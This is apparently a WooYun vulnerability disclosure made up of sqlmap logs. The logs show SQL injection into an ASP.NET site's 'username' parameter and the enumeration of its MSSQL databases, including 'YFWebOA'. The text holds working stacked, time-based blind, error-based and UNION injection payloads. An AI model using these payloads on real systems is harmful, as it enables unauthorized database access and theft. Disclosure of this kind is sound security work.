WooYun.org

---
Place: GET
Parameter: username
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=123'; WAITFOR DELAY '0:0:5'--&submit2= &Password=123
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: username=123' WAITFOR DELAY '0:0:5'--&submit2= &Password=123
---
[02:19:04] [INFO] testing Microsoft SQL Server
[02:19:04] [INFO] confirming Microsoft SQL Server
[02:19:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[02:19:04] [INFO] fetching database names
[02:19:04] [INFO] fetching number of databases
[02:19:04] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[02:19:04] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[02:19:19] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
7
[02:19:30] [INFO] retrieved:
[02:19:41] [INFO] adjusting time delay to 1 second due to good response times
master
[02:20:32] [INFO] retrieved: model
[02:21:26] [INFO] retrieved: msdb
[02:22:03] [INFO] retrieved: Northwind
[02:23:37] [INFO] retrieved: pubs
[02:24:18] [INFO] retrieved: tempdb
[02:25:18] [INFO] retrieved: YFWebOA
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YFWebOA

---
Place: GET
Parameter: username
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=123' AND 4825=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR
(116)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4825=4825) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(121)+CHAR(113))) AND 'KFPk'='KFPk&
submit2= &Password=123
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: username=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+C
HAR(121)+CHAR(116)+CHAR(107)+CHAR(113)+CHAR(86)+CHAR(115)+CHAR(88)+CHAR(66)+CHAR
(118)+CHAR(97)+CHAR(116)+CHAR(74)+CHAR(75)+CHAR(106)+CHAR(113)+CHAR(121)+CHAR(11
2)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &submit2= &Password=123
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=123'; WAITFOR DELAY '0:0:5'--&submit2= &Password=123
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: username=123' WAITFOR DELAY '0:0:5'--&submit2= &Password=123
---
[02:22:11] [INFO] testing Microsoft SQL Server
[02:22:12] [INFO] confirming Microsoft SQL Server
[02:22:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[02:22:12] [INFO] fetching database names
[02:22:12] [INFO] the SQL query used returns 7 entries
[02:22:13] [INFO] retrieved: "master"
[02:22:13] [INFO] retrieved: "model"
[02:22:13] [INFO] retrieved: "msdb"
[02:22:13] [INFO] retrieved: "Northwind"
[02:22:13] [INFO] retrieved: "pubs"
[02:22:13] [INFO] retrieved: "tempdb"
[02:22:14] [INFO] retrieved: "YFWebOA"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YFWebOA